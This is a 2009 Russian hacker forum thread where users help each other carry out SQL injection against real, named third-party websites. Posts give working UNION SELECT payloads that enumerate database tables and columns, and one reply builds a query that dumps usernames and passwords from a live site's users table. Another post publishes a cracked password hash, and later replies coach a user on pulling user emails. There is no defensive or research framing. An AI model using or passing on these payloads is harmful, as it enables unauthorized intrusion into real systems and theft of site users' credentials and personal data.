RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-03 20:23:05.686666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
Hash: 413056204f4f383895581adc97cd7d70
pass (расшифрованный Hash): SASHAb
А вообще, есть спец ветка форума…
Здесь
–>
http://forum.xakep.ru/m_1024319/tm.htm
<–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-03 20:24:30.940000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Lorden, ты постишь в топике о SQL инъекциях вопрос про хеши. Ничего не перепутал?)
Список подобных сервисов: http://forum.xakep.ru/m_1153349/tm.htm
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-03 21:05:57.610000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: farex
Hash: 413056204f4f383895581adc97cd7d70
pass (расшифрованный Hash): SASHAb
А вообще, есть спец ветка форума…
Здесь
–>
http://forum.xakep.ru/m_1024319/tm.htm
<–
спасибо большое) сори за то что нетуда постанул
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-03 22:49:46.953333
|
|
|
sver40k
Сообщений: 13
Оценки: 0
Присоединился: 2009-05-31 13:52:31.480000
|
У тянул с одного сайта phpinfo.php, там в таблице mysql есть такая строка: MYSQL_INCLUDE -l/usr/include/mysql Это баг??
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-04 16:09:58.236666
|
|
|
QunneD
Сообщений: 833
Оценки: 0
Присоединился: 2008-11-09 20:54:38.113333
|
quote:
У тянул с одного сайта phpinfo.php, там в таблице mysql есть такая строка: MYSQL_INCLUDE -l/usr/include/mysql Это баг??
Нет
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 09:14:35.300000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
подскажити, вот нашол скулу http://www.fc-zenit.ru/info/news.phtml?showPage=-3 а количество столбцов немогу подобрать( как эт зделать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 11:35:19.030000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Скуля в лимите, не прокатит. Ищи другую на сайте
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 12:03:40.060000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: Pashkela
Скуля в лимите, не прокатит. Ищи другую на сайте
спс, попробую найти…
возник ещё один вопрос вот есть такой запрос -6324+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,column_name),11+from+information_schema.columns почему выводит ток одну таблитцу и одну колонку к этой таблитце? теоретически должноже выводить все таблитцы и столбцы к этим таблитцам? или я чёт нетак понял?)
и ещё вот тут чёт непойму: http://htdig.honestjohn.co.uk/best_deals/item.htm?id=-6324+union+select+1,2,3,4,5,6,7,8,9,table_name,11+FROM+information_schema.tables+WHERE+table_schema=0x61646d696e5f75736572+LIMIT+0,1 должно перейти на таблитцу admin_user а переходит просто на странитцу(
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 14:06:55.683333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
-6324+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,column_name),11+from+information_schema.columns
Ну все правильно. Данный запрос тебе выведет поля table_name и column_name из первой строки таблицы information_schema.columns.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 14:13:51.890000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: horiz
quote:
-6324+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,column_name),11+from+information_schema.columns
Ну все правильно. Данный запрос тебе выведет поля table_name и column_name из первой строки таблицы information_schema.columns.
ммм а как зделать тогда чтоб сразу все выводило? просто на некоторых скулах когда limit невводиш там сразу выводит все таблитцы…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 14:44:28.990000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
ммм а как зделать тогда чтоб сразу все выводило? просто на некоторых скулах когда limit невводиш там сразу выводит все таблитцы…
Никак, но можно выводить больше, чем по одной с помощью group_concat()
-6324+union+select+1,2,3,4,5,6,7,8,9,group_concat(concat(table_name,0x3a,column_name)separator+0x3c62723e),11+from+information_schema.columns
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-12 19:34:49.690000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
вот нашол скулу http://eurogym.ru/index.php?lang_id=0&content_id=1' а кол-во полей енмогу подобрать( или эт какбэ отрицательная скула?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-12 19:47:00.050000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Это какбэ интербейз. Одна из самых запарных СУБД.
Вроде бы юнион в этой Субд'e работает… Однако, каждый столбец имеет определённый тип данных.
Вообщем, каждый раз, когда она мне встречалась, до конца раскрутить ни разу так и не удалось :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-12 19:51:02.770000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: r1dex
Это какбэ интербейз. Одна из самых запарных СУБД.
Вроде бы юнион в этой Субд'e работает… Однако, каждый столбец имеет определённый тип данных.
Вообщем, каждый раз, когда она мне встречалась, до конца раскрутить ни разу так и не удалось :)
ну тода небуду даже пытатся) да и непредстовляю себе чё делать нужно)
П.С. сорь что невтему но подкинте пжалуста ссылочку на FAQ по инклуду)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-14 10:56:06.003333
|
|
|
EWGhack
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-14 10:27:54.663333
|
quote:
http://sosh1.u-education.ru/?path=news15'
и не понятно
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-14 14:24:03.270000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://sosh1.u-education.ru/?path=news15%27+and+1=0+union+select+1,2,3,4,5,6,version(),8,9,0,11,12,13,14--+
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-14 14:44:33.540000
|
|
|
EWGhack
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-14 10:27:54.663333
|
r1dex спасибо!!!!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-15 14:37:04.646666
|
|
|
Viglim [23]
Сообщений: 4
Оценки: 0
Присоединился: 2009-06-15 14:01:36.006666
|
У самого так же, интербэйз плохо на раскрутку идёт..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-18 00:17:05.253333
|
|
|
ger0in
Сообщений: 2
Оценки: 0
Присоединился: 2009-06-18 00:13:44.213333
|
ребят помоги плиз с иньекцией
–
http://miss.wapos.ru/photos.php?month=4&year=2009&id=999999 union select database(),version(),3,user(),TABLE_NAME FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1/*
вот тут остановился, дальше что то не как, могу выт ащить название таблиц, а данные не как, кто как поможет7???
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-18 11:26:09.316666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
ger0in у меня твой запрос работает шикарно. Перебирай лимит, и в поле "О себе" читай имена таблиц. Учти, что сначала идут таблицы информационной схемы. А лучше посмотри имена всех баз, и читай таблицы в нужной базе.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-18 14:55:04.306666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
вот тут остановился, дальше что то не как, могу выт ащить название таблиц, а данные не как, кто как поможет7???
Дело в том, что таблицы из которых ты пытаешься получить инфу хранятся в другой бд.
Пример:
http://miss.wapos.ru/photos.php?month=4&year=2009&id=999999%20union%20select%20concat(table_name,0x3a,table_schema),2,3,4,5%20FROM%20INFORMATION_SCHEMA.TABLES+limit+35,1/*
Выводится - soligorsk_users:u01198_1
soligorsk_users - таблица
u01198_1 - бд, в которой она лежит..
Смотрим базу, с которой мы работает по умолчанию -
http://miss.wapos.ru/photos.php?month=4&year=2009&id=999999%20union%20select%20database(),2,3,4,5/*
Видим - u01198_6. С ней мы и работает по умолчанию, а наша табличка лежит в u01198_1.
Делаем вывод:
http://miss.wapos.ru/photos.php?month=4&year=2009&id=999999%20union%20select%20concat(username,0x3a,password),2,3,4,5+from+u01198_1.soligorsk_users/*
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-25 18:01:10.733333
|
|
|
pod_edge
Сообщений: 26
Оценки: 0
Присоединился: 2009-06-25 16:47:08.883333
|
Нашел багу на гугле - http://mail.google.com/support/bin/answer.py?hl=ru&answer=8870'
не могу понять, может это слепой скуль?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-25 18:42:28.796666
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
нет
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-28 14:01:57.246666
|
|
|
wolbro
Сообщений: 20
Оценки: 0
Присоединился: 2009-03-09 16:36:44.500000
|
Помогите пожалуйста вот с этим http://www.voob.ru/page.php?division_id=-1+union+select+1,version(),3,4/* . Прочитал статью Уроки группи 9009 но не получается. Помогите плз
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-28 18:48:31.510000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Что именно не получается?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 19:58:31.353333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
подскажите пожалуйста что подставить, а то я всё перепробывал
&date_start=1228078800&date_end=-1+UNION+SELECT+1
The used SELECT statements have a different number of columns SQL was: SELECT se_blogentries.*, se_blogentrycats.*, (SELECT COUNT(*) FROM se_blogcomments WHERE se_blogentries.blogentry_id=se_blogcomments.blogcomment_blogentry_id) as total_comments, (SELECT COUNT(*) FROM se_blogtrackbacks WHERE se_blogentries.blogentry_id=se_blogtrackbacks.blogtrackback_blogentry_id) as total_trackbacks FROM se_blogentries LEFT JOIN se_blogentrycats ON se_blogentries.blogentry_blogentrycat_id=se_blogentrycats.blogentrycat_id WHERE blogentry_user_id='120' AND (blogentry_privacy & '32') && blogentry_date>1228078800 && blogentry_date<-1 UNION SELECT 1 ORDER BY blogentry_date DESC LIMIT 0, 50
&date_start=1228078800&date_end=-1+UNION+SELECT+1,2
The used SELECT statements have a different number of columns SQL was: SELECT NULL FROM se_blogentries WHERE blogentry_user_id='120' AND (blogentry_privacy & '32') && blogentry_date>1228078800 && blogentry_date<-1 UNION SELECT 1,2
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:26:16.053333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
GoldCode попробуй так:
&date_start=1228078800&date_end=-1+UNION+SELECT+1,2,3,4–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:28:00.003333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
The used SELECT statements have a different number of columns SQL was:
SELECT
se_blogentries.*,
se_blogentrycats.*,
(SELECT COUNT(*) FROM se_blogcomments WHERE se_blogentries.blogentry_id=se_blogcomments.blogcomment_blogentry_id) as total_comments,
(SELECT COUNT(*) FROM se_blogtrackbacks WHERE se_blogentries.blogentry_id=se_blogtrackbacks.blogtrackback_blogentry_id) as total_trackbacks
FROM
se_blogentries
LEFT JOIN
se_blogentrycats
ON se_blogentries.blogentry_blogentrycat_id=se_blogentrycats.blogentrycat_id
WHERE
blogentry_user_id='47'
AND
(blogentry_privacy & '32') && blogentry_blogentrycat_id=-1 UNION SELECT 1
ORDER BY
blogentry_date DESC
LIMIT
0, 50
&category_id=-1+UNION+SELECT+1,2
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:29:48.240000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
ORIGINAL: horiz
GoldCode попробуй так:
&date_start=1228078800&date_end=-1+UNION+SELECT+1,2,3,4–
The used SELECT statements have a different number of columns SQL was:
SELECT
NULL
FROM
se_blogentries
WHERE
blogentry_user_id='120'
AND
(blogentry_privacy & '32') && blogentry_date>1228078800 && blogentry_date<-1 UNION SELECT 1,2,3,4–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:46:03.620000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Здесь нельзя заранее сказать количество полей. В таком случае пробуй тупой перебор.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:55:53.176666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
я до 15 дошел?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:58:35.563333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Может быть гораздо больше.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:59:39.906666
|
|
|
hack001
Сообщений: 2
Оценки: 0
Присоединился: 2009-06-27 20:49:40.086666
|
а какие ещё есть варианты слова юзеров на сайте , кроме user , id , username ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 21:25:42.860000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
ORIGINAL: hack001
а какие ещё есть варианты слова юзеров на сайте , кроме user , id , username ?
http://xx.ru/users/
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 22:02:04.403333
|
|
|
pod_edge
Сообщений: 26
Оценки: 0
Присоединился: 2009-06-25 16:47:08.883333
|
а что вот с этим:
https://developer.mozilla.org/index.php?title=Special:Article&type=backlinks&pageid=117'
вроде не скул, но что-нибудь можно из ошибки вытащить?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 22:05:17.666666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
?s=classified_date%20DESC&v=0&classifiedcat_id=99999+union+select+concat_ws(0x20,version(),user(),database()),2,3
4.1.22-standard-log
emotiona_***@localhost
emotiona_***
как мне теперь узнать емайл пользователя?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 22:14:35.210000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
а что вот с этим:
https://developer.mozilla.org/index.php?title=Special:Article&type=backlinks&pageid=117'
вроде не скул, но что-нибудь можно из ошибки вытащить?
Возьми любой переводчик и посмотри, как переводится эта ошибка.
quote:
?s=classified_date%20DESC&v=0&classifiedcat_id=99999+union+select+concat_ws(0x20,version(),user(),database()),2,3
4.1.22-standard-log
emotiona_***@localhost
emotiona_***
как мне теперь узнать емайл пользователя?
Подобрать таблицу, подобрать колонки, составить запрос.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 22:22:50.303333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
?s=classified_date%20DESC&v=0&classifiedcat_id=99999+union+select+concat_ws(0x20,version(),user(),database()),2,3
4.1.22-standard-log
emotiona_***@localhost
emotiona_***
как мне теперь узнать емайл пользователя?
Подобрать таблицу, подобрать колонки, составить запрос.
ну я понимаю что надо запрос сотавить, он как хоть выглядить должен?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-30 02:46:13.570000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
?s=classified_date%20DESC&v=0&classifiedcat_id=99999+union+select+concat_ws(0x20,колонка,колонка),2,3+from+таблица+limit+0,1
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-30 17:43:29.166666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
спс, разобрался!
|
|
|
|
|
|
